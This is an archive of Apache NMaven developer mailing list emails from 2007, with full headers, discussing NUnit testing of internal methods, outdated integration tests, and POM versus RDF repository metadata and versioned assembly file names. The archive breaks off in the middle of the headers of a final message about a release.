b=MGc/0BZW0cglvJLYSxHwLgd5Kyk4n63at4mYZNpVLnSlcPj+/bctveoZ81AAD8urKxSaLrz6DmNL7grBBZp79m/Xw2ulr8QsNpA0rWdHM8QDen8rikimaZKBWbOpOd8stBXLl+FvtLg/PZAdKSpBmZ8Hi/ak8/WCss/NGM/Iqck= Received: by 161.129.204.104 with SMTP id g18mr2813806rvj.1192469278999; Mon, 15 Oct 2007 10:27:58 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 15 Oct 2007 10:27:58 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 15 Oct 2007 10:27:58 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: NUnit Tests In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_36705_743197.1192469278981" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_36705_743197.1192469278981 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline I think that the friendly assembly approach that you are investigating would be better, as it would not require a recompile. It would, however, require generating of keys and signing of assemblies. On 10/14/07, Evan Worley <[email protected]> wrote: > > We have the same problem with NMaven testing, where we can't test non > public > classes due to dll visibility. One solution we were thinking of is adding > friendly dll support to NMaven, then we could have the test assembly be > friends with the assembly that it's testing. The second approach would be > a > compile all of the source into the test artifact, which is the option you > listed above. > > Which do you think is a better approach? > > -Evan > > On 10/12/07, Shane Isbell <[email protected]> wrote: > > > > I was recently working on NUnit tests and I found the current method of > > how > > NMaven handles unit testing inadequete. The problem occurs because C#'s > > protected method is accessible only within the defining class and > > its derived classes, unlike Java which includes package level access. > > NMaven > > currently compiles the test and main artifacts into separate assemblies, > > so > > I also can't test an internal method either. This leaves the ability of > > only > > testing public methods, which are a little too coarse grained for what I > > need. One option that I am considering is to 1) compile main artifact,; > 2) > > compile test artifact, which includes both main and test classes. This > > would > > require compiling the main classes twice but would allow the testing of > > internal methods. I am not sure how people are building > > their .NET applications or whether this option would cause performance > > problems. Thoughts? > > > > Shane > > > ------=_Part_36705_743197.1192469278981-- From [email protected] Mon Oct 15 17:33:36 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97430 invoked from network); 15 Oct 2007 17:33:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2007 17:33:36 -0000 Received: (qmail 88403 invoked by uid 500); 15 Oct 2007 17:33:20 -0000 Delivered-To: [email protected] Received: (qmail 88387 invoked by uid 500); 15 Oct 2007 17:33:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88377 invoked by uid 99); 15 Oct 2007 17:33:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 10:33:19 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 17:33:23 +0000 Received: by nz-out-0506.google.com with SMTP id o37so978942nzf for <[email protected]>; Mon, 15 Oct 2007 10:33:02 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=HUHizvRWvulmhEucCa8e0avPe3Su6gwqqA9nymL6oi8=; b=DrMYsbr2A/Y0l471LX1F87M8gOwr2CTpL7erNx/56sibo1NDZxr+i9TaIy2TsS6sdWrEafDMKTJa8r74Xbu47qbOXOUCF2GG/sjn6ggF+VOb6zciVsOOoFwXIeXsvQLkuv9tU1i7O+degC7LyYyH8kBIjdE2kE0GurXh9tXNJiY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=DdKhz9EIyfOkB0ps+OI7UFU2fCizLXxmBs6QZWxyel/wJUgHzQEX3bGMXGppBABdIiRegtDCa87apIc85AKJ1MBZQ32WjOYNqSfxfKWJj6vS7K0l0TAC+nk3nI8SVj5KLLqbw855BAq7qMQJsQQLehW5b1ZawIAuEFOLddQRmQs= Received: by 161.129.204.104 with SMTP id y14mr2820800rvc.1192469581492; Mon, 15 Oct 2007 10:33:01 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 15 Oct 2007 10:33:01 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 15 Oct 2007 10:33:01 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Integration Tests In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_36723_2097537.1192469581486" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_36723_2097537.1192469581486 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline They can be retrofitted, of course, but they are still dated because a lot of the dependency tests deal with netmodules, which are no longer supported. Also most of the tests were created before the introduction of the nmaven-settings.xml file, which now allows us to test under Mono and Microsoft, without explictly defining the vendor within the pom.xml file itself, thus we can reduce the number of IT tests. On 10/14/07, Evan Worley <[email protected]> wrote: > > Can the old ITs be retrofitted to the new framework, or do we actually > have > to write entirely new tests? > > _Evan > > On 10/12/07, Shane Isbell <[email protected]> wrote: > > > > Since the late July version of NMaven, which includes the new > > implementation > > of the resolver and repository, all of the integration tests are > invalid. > > I > > recently encountered a problem with the web archive packaging not > working, > > which I would have caught earlier had the cases been up-to-date. I'm > > going > > to be working on getting a batch of new integration tests written. If > > anybody has time to jump in and help, I'd appreciate it. > > > > Thanks, > > Shane > > > ------=_Part_36723_2097537.1192469581486-- From [email protected] Thu Oct 18 00:29:41 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39124 invoked from network); 18 Oct 2007 00:29:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Oct 2007 00:29:41 -0000 Received: (qmail 36568 invoked by uid 500); 18 Oct 2007 00:29:28 -0000 Delivered-To: [email protected] Received: (qmail 36512 invoked by uid 500); 18 Oct 2007 00:29:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36495 invoked by uid 99); 18 Oct 2007 00:29:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Oct 2007 17:29:27 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 00:29:19 +0000 Received: by rv-out-0910.google.com with SMTP id k20so4442rvb for <[email protected]>; Wed, 17 Oct 2007 17:28:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=acBPkWljOfQtLSZdSIQxyDh4rC7E9+S4Ii17Kuf/KA8=; b=pbdP+ER3ZWbhPhlny+i1Dcjt17CG9bQP4qbOILZCI7roEuTXiVcEv6wIB23zd66d6hvM/Le6ZwtJfylsJ8ePOnrGQh7mmG9jO320Arah3NGX8OSiqknfvQ4vu03eFRr+5SE2niZcgdtFX3z8xz13MrzZli2Qxl2PRoGH0zWg7Gc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=iJuXZI5ZhWk53Its9XKgrNI3qp0luO4d95sMSMcOG6CeDpKwDneqBAGJmosC1Pk/RCGqhlIgxXpgLl3esooE7IDcgtvb1nxf63iu4t9iuohNjzk/QomofoSjw9iaJf66jUzXPAWTxDhfkI3Ir3wvFqDfAEOTVOE05NaSi3vWwvI= Received: by 161.129.204.104 with SMTP id q9mr4597662rvd.1192667330608; Wed, 17 Oct 2007 17:28:50 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 17 Oct 2007 17:28:23 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 17 Oct 2007 17:28:23 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: NMaven not using POMs in local repository In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2858_3311144.1192667303614" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_2858_3311144.1192667303614 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Anybody have problems with requiring versions in the filename/assemblyname? On 10/15/07, Shane Isbell <[email protected]> wrote: > > Hi Evan, > > You can use versions in the file name, it's just that it changes the way > the assembly is loaded. See > > > http://www.jroller.com/random7/entry/apache_nmaven_repository_structure_and > > http://docs.codehaus.org/display/MAVENUSER/BEA+Maven+Requirement+Documents > > > for some explanation. If you recall, we went down the path of versioning > in the remote repos and not versioning in the local repo (look at the blog > entry above for a more detailed explanation). It was all of these problems > which led me to rewrite the resolver and split the repository. From my > perspective, I'm not too keen on the "copy the assembly approach", not > because I don't think we can't make it work, but because I think that it > gets way too complicated. Remember, we also need to support at least a > single classifier, attached artifacts and snapshots, so it promises to get > more complicated with all the renaming and overlapping repos. > > Regards, > Shane > > On 10/15/07, Evan Worley <[email protected]> wrote: > > > > Hi Shane, > > > > Isn't one of the underlying problems that the .net framework does not > > allow > > for versions in the file name? This is why we have utilized the > > AssemblyInfo in the past. Would the strategy still be to have versioned > > files in remote repos, but rename the latest version to be version-less > > in > > the local repository? > > > > Thanks, > > Evan > > > > On 10/15/07, Shane Isbell < [email protected]> wrote: > > > > > > Hi Jason, > > > > > > We can isolate the two main issues as 1) RDF: this is there to provide > > > tool-chain/classifier/capabilities support; 2) resolving has problems > > > largely deriving from removing of versions from the file name. > > > > > > If everyone is okay pushing off the tool chain and/or capabilities > > > support, > > > then we can dump it. Admittedly, this is a huge part of NMaven but it > > does > > > make it tougher to jump into the code and if no one needs this right > > now, > > > then it's more of hindrance than anything. > > > > > > In regards to (2), including a version in the file name enforces a > > type of > > > strong name loading. You won't be able to just swap out different > > versions > > > of assemblies during runtime, but rather you'll need to recompile the > > > whole > > > chain of assemblies. Personally, I think we're going to need signed > > > assemblies in the public open-source repositories, so including > > versions > > > in > > > the filename won't be a big deal. The problem with including versions > > in > > > the > > > file name would occur for things like web apps (or executables) that > > have > > > private application spaces, where someone wants to just plop in a new > > > version of their assembly and restart the application. In this case, > > they > > > may need to recompile a number of assemblies (even transitive > > relations) > > > that depend on that assembly. I'm also okay with including versions in > > the > > > file name, as long as everyone accepts and can deal with the > > limitations. > > > This would very quickly bring NMaven back in line with Maven. > > > > > > If we can get a discussion going and then a vote, we can move quickly > > to > > > start making any changes. > > > > > > Regards, > > > Shane > > > > > > > > > On 10/14/07, Jason van Zyl < [email protected]> wrote: > > > > > > > > Hi Shane, > > > > > > > > Do you have any plans for switching the local repository mechanism > > > > back to using POMs? > > > > > > > > I would at least like to have a flavor that works like Maven > > normally > > > > does and for this to be the default. For me this is requisite for > > > > NMaven to be integrated into the Maven project. I realize that there > > > > are shortcomings with the artifact resolution mechanism and using > > RDF > > > > might be good for exploration, but it makes NMaven too divergent > > from > > > > Maven IMO, is confusing to users and really makes NMaven something > > > > different. > > > > > > > > I think you're having a hard enough time getting a community going > > > > and I don't think this fundamental difference in behavior is going > > to > > > > help much in that respect. For me, the three groups I know who are > > > > using it, use both Java and .NET and I always get asked why doesn't > > > > NMaven use POMs like Maven? Will NMaven not currently work without > > > > RDF? And do you really see there being value in being wholly > > > > different with respect to local repository metadata? > > > > > > > > On 30 Sep 07, at 7:57 PM 30 Sep 07, Shane Isbell wrote: > > > > > > > > > Hi Paul, > > > > > > > > > > When NMaven checks for the existence of a file locally, it looks > > in > > > > > the uac > > > > > directory not the repository directory. I am wondering whether the > > > > > meta-data > > > > > in your RDF repo is correct. Can you try: > > > > > > > > > > mvn org.apache.maven.dotnet.plugins:maven-repository- > > > > > plugin:export-rdf > > > > > > > > > > and post the results of the > > > > > .m2/uac/rdfRepository/rdf-repository-export.xmlto a jira? I'll > > take a > > > > > look at it as a starting point to track down the > > > > > problem. > > > > > > > > > > Thanks, > > > > > Shane > > > > > > > > > > > > > > > On 9/28/07, paul anderson <[email protected]> wrote: > > > > >> > > > > >> Greetings. Seasoned java/regular maven user here. Now working > > > > >> with .NET . > > > > >> . . . . > > > > >> > > > > >> Building went fine - (had csc and xsd.exe on path). > > > > >> > > > > >> problem came when trying to actually use : mvn compile with a > > valid > > > > >> pom.xml file in the directory > > > > >> (note that I also did not have an nmaven-settings.xml file - not > > sure > > > > >> why): > > > > >> > > > > >> got this (between * for easy parsing): > > > > >> > > > > >> > > ********************************************************************* > > > > >> ************** > > > > >> [INFO] Scanning for projects... > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> ------- > > > > >> [INFO] Building Unnamed - snipped:ratecube:library:1.0 > > > > >> [INFO] task-segment: [compile] > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> ------- > > > > >> [INFO] [compile:initialize] > > > > >> [INFO] Mojo Execution Time = 0 > > > > >> [INFO] [resolver:resolve] > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> --- > > > > >> [ERROR] BUILD ERROR > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> --- > > > > >> [INFO] Failed to resolve artifact. > > > > >> > > > > >> Missing: > > > > >> ---------- > > > > >> 1) NMaven.Plugins:NMaven.Plugin.Resx:exe.config:0.14-SNAPSHOT > > > > >> > > > > >> Try downloading the file manually from the project website. > > > > >> > > > > >> Then, install it using the command: > > > > >> mvn install:install-file -DgroupId=NMaven.Plugins-DartifactId= > > > > >> NMaven.Plugin.Resx \ > > > > >> -Dversion= 0.14-SNAPSHOT -Dpackaging=exe.config-Dfile=/ > > > > >> path/to/file > > > > >> > > > > >> > > > > >> > > ********************************************************************* > > > > >> ************************** > > > > >> > > > > >> So, I did just that, where I set /path/tofile = to: > > > > >> > > > > >> C:\Docume~1\<homedir>\.m2\repository\NMaven\Plugins > > > > >> \NMaven.Plugin.Resx\0.14-SNAPSHOT\NMaven.Plugin.Resx.exe > > > > >> > > > > >> Note that I *found* the supposedly not-found resx plugin where it > > was > > > > >> supposed to be. Am I missing > > > > >> something here? > > > > >> > > > > >> Anyway, that generated my nmaven-settings.xml file, and the > > > > >> following mvn > > > > >> compile worked. > > > > >> > > > > >> Hope this helps at least someone - I scratched my head for a day > > > > >> over this > > > > >> one. Oh - I also read > > > > >> the README.txt, and something in there triggered my thinking > > about > > > > >> forcing > > > > >> the install of the file > > > > >> that I knew I had. > > > > >> > > > > >> > > > > >> > > > > >> > > _____________________________________________________________________ > > > > >> _______________ > > > > >> Shape Yahoo! in your own image. Join our Network Research Panel > > > > >> today! > > > > >> http://surveylink.yahoo.com/gmrs/yahoo_panel_invite.asp?a=7 > > > > >> > > > > >> > > > > >> > > > > > > > > Thanks, > > > > > > > > Jason > > > > > > > > ---------------------------------------------------------- > > > > Jason van Zyl > > > > Founder, Apache Maven > > > > [email protected] > > > > ---------------------------------------------------------- > > > > > > > > > > > > > > > > > > > > > > > ------=_Part_2858_3311144.1192667303614-- From [email protected] Thu Oct 18 00:29:49 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39196 invoked from network); 18 Oct 2007 00:29:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Oct 2007 00:29:49 -0000 Received: (qmail 36680 invoked by uid 500); 18 Oct 2007 00:29:37 -0000 Delivered-To: [email protected] Received: (qmail 36661 invoked by uid 500); 18 Oct 2007 00:29:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36652 invoked by uid 99); 18 Oct 2007 00:29:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Oct 2007 17:29:37 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 00:29:38 +0000 Received: by rv-out-0910.google.com with SMTP id k20so4480rvb for <[email protected]>; Wed, 17 Oct 2007 17:29:07 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=acBPkWljOfQtLSZdSIQxyDh4rC7E9+S4Ii17Kuf/KA8=; b=YBhSSoZYNHAApKqDvIxXAxbLREFrE/PwIyV5F5dTIzH3lLZo4xVXeiKLDZvqIEm6jSGWd27VzpQExA76MLwkJWvGQYif5slheDgRbjLMDLoMSmoeLvm+mr/IDic2TPJMGZDQRd5B3pttn8Bv18yEbZ7hFNzyerdWWRYFxAvdilI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Nj+TJ4ki4kE6UuzF1J5t2AytYI1jl7F6Qs1BhzGQMd+SXm2e6fyh1QTA9zaXiQwB9rWxNniKdETgzXsTazsFQtxV2A9qRZd58xVwY5RGnR9W3kDnVvwSgn4IBWoitsBEUhdg5e/AM5IfLNuEUWjdrcUvl7mBr8wsmgaOKnou9T8= Received: by 161.129.204.104 with SMTP id h10mr4620302rvq.1192667303600; Wed, 17 Oct 2007 17:28:23 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 17 Oct 2007 17:28:23 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 17 Oct 2007 17:28:23 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: NMaven not using POMs in local repository In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2858_3311144.1192667303614" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_2858_3311144.1192667303614 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Anybody have problems with requiring versions in the filename/assemblyname? On 10/15/07, Shane Isbell <[email protected]> wrote: > > Hi Evan, > > You can use versions in the file name, it's just that it changes the way > the assembly is loaded. See > > > http://www.jroller.com/random7/entry/apache_nmaven_repository_structure_and > > http://docs.codehaus.org/display/MAVENUSER/BEA+Maven+Requirement+Documents > > > for some explanation. If you recall, we went down the path of versioning > in the remote repos and not versioning in the local repo (look at the blog > entry above for a more detailed explanation). It was all of these problems > which led me to rewrite the resolver and split the repository. From my > perspective, I'm not too keen on the "copy the assembly approach", not > because I don't think we can't make it work, but because I think that it > gets way too complicated. Remember, we also need to support at least a > single classifier, attached artifacts and snapshots, so it promises to get > more complicated with all the renaming and overlapping repos. > > Regards, > Shane > > On 10/15/07, Evan Worley <[email protected]> wrote: > > > > Hi Shane, > > > > Isn't one of the underlying problems that the .net framework does not > > allow > > for versions in the file name? This is why we have utilized the > > AssemblyInfo in the past. Would the strategy still be to have versioned > > files in remote repos, but rename the latest version to be version-less > > in > > the local repository? > > > > Thanks, > > Evan > > > > On 10/15/07, Shane Isbell < [email protected]> wrote: > > > > > > Hi Jason, > > > > > > We can isolate the two main issues as 1) RDF: this is there to provide > > > tool-chain/classifier/capabilities support; 2) resolving has problems > > > largely deriving from removing of versions from the file name. > > > > > > If everyone is okay pushing off the tool chain and/or capabilities > > > support, > > > then we can dump it. Admittedly, this is a huge part of NMaven but it > > does > > > make it tougher to jump into the code and if no one needs this right > > now, > > > then it's more of hindrance than anything. > > > > > > In regards to (2), including a version in the file name enforces a > > type of > > > strong name loading. You won't be able to just swap out different > > versions > > > of assemblies during runtime, but rather you'll need to recompile the > > > whole > > > chain of assemblies. Personally, I think we're going to need signed > > > assemblies in the public open-source repositories, so including > > versions > > > in > > > the filename won't be a big deal. The problem with including versions > > in > > > the > > > file name would occur for things like web apps (or executables) that > > have > > > private application spaces, where someone wants to just plop in a new > > > version of their assembly and restart the application. In this case, > > they > > > may need to recompile a number of assemblies (even transitive > > relations) > > > that depend on that assembly. I'm also okay with including versions in > > the > > > file name, as long as everyone accepts and can deal with the > > limitations. > > > This would very quickly bring NMaven back in line with Maven. > > > > > > If we can get a discussion going and then a vote, we can move quickly > > to > > > start making any changes. > > > > > > Regards, > > > Shane > > > > > > > > > On 10/14/07, Jason van Zyl < [email protected]> wrote: > > > > > > > > Hi Shane, > > > > > > > > Do you have any plans for switching the local repository mechanism > > > > back to using POMs? > > > > > > > > I would at least like to have a flavor that works like Maven > > normally > > > > does and for this to be the default. For me this is requisite for > > > > NMaven to be integrated into the Maven project. I realize that there > > > > are shortcomings with the artifact resolution mechanism and using > > RDF > > > > might be good for exploration, but it makes NMaven too divergent > > from > > > > Maven IMO, is confusing to users and really makes NMaven something > > > > different. > > > > > > > > I think you're having a hard enough time getting a community going > > > > and I don't think this fundamental difference in behavior is going > > to > > > > help much in that respect. For me, the three groups I know who are > > > > using it, use both Java and .NET and I always get asked why doesn't > > > > NMaven use POMs like Maven? Will NMaven not currently work without > > > > RDF? And do you really see there being value in being wholly > > > > different with respect to local repository metadata? > > > > > > > > On 30 Sep 07, at 7:57 PM 30 Sep 07, Shane Isbell wrote: > > > > > > > > > Hi Paul, > > > > > > > > > > When NMaven checks for the existence of a file locally, it looks > > in > > > > > the uac > > > > > directory not the repository directory. I am wondering whether the > > > > > meta-data > > > > > in your RDF repo is correct. Can you try: > > > > > > > > > > mvn org.apache.maven.dotnet.plugins:maven-repository- > > > > > plugin:export-rdf > > > > > > > > > > and post the results of the > > > > > .m2/uac/rdfRepository/rdf-repository-export.xmlto a jira? I'll > > take a > > > > > look at it as a starting point to track down the > > > > > problem. > > > > > > > > > > Thanks, > > > > > Shane > > > > > > > > > > > > > > > On 9/28/07, paul anderson <[email protected]> wrote: > > > > >> > > > > >> Greetings. Seasoned java/regular maven user here. Now working > > > > >> with .NET . > > > > >> . . . . > > > > >> > > > > >> Building went fine - (had csc and xsd.exe on path). > > > > >> > > > > >> problem came when trying to actually use : mvn compile with a > > valid > > > > >> pom.xml file in the directory > > > > >> (note that I also did not have an nmaven-settings.xml file - not > > sure > > > > >> why): > > > > >> > > > > >> got this (between * for easy parsing): > > > > >> > > > > >> > > ********************************************************************* > > > > >> ************** > > > > >> [INFO] Scanning for projects... > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> ------- > > > > >> [INFO] Building Unnamed - snipped:ratecube:library:1.0 > > > > >> [INFO] task-segment: [compile] > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> ------- > > > > >> [INFO] [compile:initialize] > > > > >> [INFO] Mojo Execution Time = 0 > > > > >> [INFO] [resolver:resolve] > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> --- > > > > >> [ERROR] BUILD ERROR > > > > >> [INFO] > > > > >> > > --------------------------------------------------------------------- > > > > >> --- > > > > >> [INFO] Failed to resolve artifact. > > > > >> > > > > >> Missing: > > > > >> ---------- > > > > >> 1) NMaven.Plugins:NMaven.Plugin.Resx:exe.config:0.14-SNAPSHOT > > > > >> > > > > >> Try downloading the file manually from the project website. > > > > >> > > > > >> Then, install it using the command: > > > > >> mvn install:install-file -DgroupId=NMaven.Plugins-DartifactId= > > > > >> NMaven.Plugin.Resx \ > > > > >> -Dversion= 0.14-SNAPSHOT -Dpackaging=exe.config-Dfile=/ > > > > >> path/to/file > > > > >> > > > > >> > > > > >> > > ********************************************************************* > > > > >> ************************** > > > > >> > > > > >> So, I did just that, where I set /path/tofile = to: > > > > >> > > > > >> C:\Docume~1\<homedir>\.m2\repository\NMaven\Plugins > > > > >> \NMaven.Plugin.Resx\0.14-SNAPSHOT\NMaven.Plugin.Resx.exe > > > > >> > > > > >> Note that I *found* the supposedly not-found resx plugin where it > > was > > > > >> supposed to be. Am I missing > > > > >> something here? > > > > >> > > > > >> Anyway, that generated my nmaven-settings.xml file, and the > > > > >> following mvn > > > > >> compile worked. > > > > >> > > > > >> Hope this helps at least someone - I scratched my head for a day > > > > >> over this > > > > >> one. Oh - I also read > > > > >> the README.txt, and something in there triggered my thinking > > about > > > > >> forcing > > > > >> the install of the file > > > > >> that I knew I had. > > > > >> > > > > >> > > > > >> > > > > >> > > _____________________________________________________________________ > > > > >> _______________ > > > > >> Shape Yahoo! in your own image. Join our Network Research Panel > > > > >> today! > > > > >> http://surveylink.yahoo.com/gmrs/yahoo_panel_invite.asp?a=7 > > > > >> > > > > >> > > > > >> > > > > > > > > Thanks, > > > > > > > > Jason > > > > > > > > ---------------------------------------------------------- > > > > Jason van Zyl > > > > Founder, Apache Maven > > > > [email protected] > > > > ---------------------------------------------------------- > > > > > > > > > > > > > > > > > > > > > > > ------=_Part_2858_3311144.1192667303614-- From [email protected] Thu Oct 18 03:55:36 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6873 invoked from network); 18 Oct 2007 03:55:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Oct 2007 03:55:36 -0000 Received: (qmail 84921 invoked by uid 500); 18 Oct 2007 03:55:23 -0000 Delivered-To: [email protected] Received: (qmail 84900 invoked by uid 500); 18 Oct 2007 03:55:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84891 invoked by uid 99); 18 Oct 2007 03:55:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 17 Oct 2007 20:55:23 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 03:55:27 +0000 Received: by rv-out-0910.google.com with SMTP id k20so44499rvb for <[email protected]>; Wed, 17 Oct 2007 20:55:05 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=St5yweN4r5T9eNBZbnvdUBv3IQk6x/yH4z+V+Xl9U58=; b=nA8hI5/mDEQc6TRSNmD/btuAB4Eic9nhkOw24bJOf+eGpfJ6oCztNoaXYK4h3QxAFI/irK99o0oSQlTqFSIcR4u27CyPsS74a3VgeR9mbt4jj8fS6gLsOdYiX7ThPx2w8xPUizM5dSMC0c50Ela21LJ0UHYjZHy1RLb4hIIHRPE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=poqYZBJo27AMUf15stpPsNybz22aVT9v+9yzYxEg99JTXMlbuIvtoUhZJOvmOeJNQeLI+e9cXp5RMDeykxhXTCgogDuZOm24LJfszb6xn3dqt/yoVJNGuQ0uaU+3mG26NABI5onrWnrDIHytgw56KuX/cQRh4B2kRImezm0Ed3s= Received: by 161.129.204.104 with SMTP id m5mr35227rvq.1192679705587; Wed, 17 Oct 2007 20:55:05 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 17 Oct 2007 20:55:05 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 17 Oct 2007 20:55:05 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Thoughts on an NMaven Release In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_165_8573696.1192679705592" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_165_8573696.1192679705592 Content-Type: 